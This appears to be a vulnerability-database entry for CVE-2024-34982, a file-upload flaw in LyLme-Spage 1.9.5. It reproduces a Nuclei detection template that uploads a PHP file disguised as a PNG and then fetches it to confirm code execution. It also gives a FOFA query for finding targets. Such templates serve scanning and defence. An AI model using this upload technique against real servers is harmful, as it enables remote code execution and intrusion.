CVE-2024-34982: LyLme-Spage - Arbitary File Upload

日期: 2025-08-01 | 影响软件: LyLme-Spage | POC: 已公开

漏洞描述

An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

PoC代码[已公开]

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  impact: |
    Attackers can upload arbitrary files to execute malicious code on the LyLme-Spage server.
  remediation: |
    Update LyLme Spage to a version later than 1.9.5 that patches the arbitrary file upload vulnerability.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    epss-score: 0.7835
    epss-percentile: 0.98985
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive,vuln

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4a0a004730450220140010ced3ffaca65fe5eab6ba1a07eee82a85afd83e124889ac9004e2dfab7b022100ad471f1a852f664f88e08ce2121f956baf347c80f19583e4e2e3a109a9c82a86:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34982.yaml

相关漏洞推荐